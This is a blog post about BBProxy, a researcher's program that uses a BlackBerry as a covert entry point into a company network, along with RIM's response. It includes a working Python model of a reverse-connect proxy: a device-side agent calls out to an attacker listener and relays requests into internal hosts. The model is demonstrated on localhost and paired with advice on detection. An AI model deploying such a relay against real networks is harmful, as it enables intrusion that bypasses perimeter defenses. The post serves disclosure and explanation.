One of the things that RIM prides itself on is the tight security offered by the BlackBerry and the BlackBerry Enterprise Server. However, Wired is reporting that maybe our beloved device isn’t as secure as we previously thought. Jesse D’Aguanno, a consultant with Praetorian Global, says he has developed a program called BBProxy that could give hackers direct entry to your company’s network through your BlackBerry.
BBProxy has to be placed on a BlackBerry either physically or as a Trojan horse delivered by e-mail. Once installed, it connects back to the attacker’s system in the background, opening a communications channel between the attacker and the company’s internal network. Because the device initiates that connection outbound, a perimeter firewall that only restricts inbound traffic never sees anything to block. From there, safely behind the organization’s firewall, the intruder can scan for hosts with security vulnerabilities.
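To make the channel described above concrete, here is a small model of a reverse-connect proxy, written for this post as an added example; it is not BBProxy itself and not code from D’Aguanno or RIM. Three roles run on localhost: a constructed stand-in for an internal host, an "attacker" listener, and a "handheld" agent that connects out to the attacker and then relays one request into the internal service. The host names, ports, the `CONNECT host port` control line and the one-line request framing are all assumptions made for the demo.

```python
"""Model of a reverse-connect proxy channel (added example, not BBProxy)."""
import socket
import threading


def start_internal_service(banner: bytes) -> int:
    """Constructed stand-in for an internal host: answers one request line, then exits.
    Returns the ephemeral port it listens on."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)

    def serve():
        conn, _ = srv.accept()
        with conn:
            req = conn.makefile("rb").readline()
            conn.sendall(banner + b" got " + req.strip() + b"\n")
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


def run_handheld_agent(attacker_host: str, attacker_port: int) -> None:
    """Device side. The agent dials OUT to the attacker, so a firewall that only
    filters inbound connections sees nothing to block. It then opens a connection
    from inside the network to whatever host the attacker names (assumed framing:
    'CONNECT <host> <port>' followed by one request line) and relays the reply."""
    ctl = socket.create_connection((attacker_host, attacker_port))
    with ctl:
        f = ctl.makefile("rb")
        cmd = f.readline().decode().split()
        if len(cmd) != 3 or cmd[0] != "CONNECT":
            return
        payload = f.readline()
        with socket.create_connection((cmd[1], int(cmd[2]))) as inner:
            inner.sendall(payload)
            reply = inner.makefile("rb").readline()
        ctl.sendall(reply)


def run_attacker(target_host: str, target_port: int, request: bytes):
    """Attacker side: waits for the callback, then tunnels one request through it.
    Returns (listening port, worker thread, dict that will hold the reply)."""
    lst = socket.socket()
    lst.bind(("127.0.0.1", 0))
    lst.listen(1)
    result = {}

    def accept_and_tunnel():
        conn, _ = lst.accept()
        with conn:
            conn.sendall(f"CONNECT {target_host} {target_port}\n".encode())
            conn.sendall(request)
            result["reply"] = conn.makefile("rb").readline()
        lst.close()

    t = threading.Thread(target=accept_and_tunnel, daemon=True)
    t.start()
    return lst.getsockname()[1], t, result


def demo(request: bytes = b"GET /status\n") -> bytes:
    """Wire the three roles together on localhost and return what the attacker
    received from the internal host via the handheld."""
    internal_port = start_internal_service(b"INTERNAL-HOST")
    attacker_port, worker, result = run_attacker("127.0.0.1", internal_port, request)
    run_handheld_agent("127.0.0.1", attacker_port)
    worker.join(timeout=5)
    return result.get("reply", b"")


if __name__ == "__main__":
    print(demo())
```

The point the model makes is the one in the paragraph above: the only connection that crosses the perimeter is an outbound one from the device, and everything the attacker does afterwards is an ordinary internal-to-internal connection. Detecting it therefore depends on watching what the device (and, in the real deployment, the BES/MDS path it rides) connects to inside the network, not on the perimeter.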
D’Aguanno says the technique is successful because most companies aren’t equipped to detect someone trying to deliver an exploit from inside the network, and because few companies view the Blackberry as a plausible attack vector.
“Because it’s a handheld device, most people don’t think it’s something that can actually harm the rest of your internal network,” D’Aguanno said. “But a Blackberry is not your average handheld. It’s not just a PDA that’s connected (to your network) only when you’re in the office. It’s a code-running machine that’s always on and always connected to your internal network and has direct access to whatever you give it access to. And most company architectures allow it unfettered access to everything on the internal network.”
D’Aguanno has been in contact with RIM about this, and the company has released two new security documents on its website this week.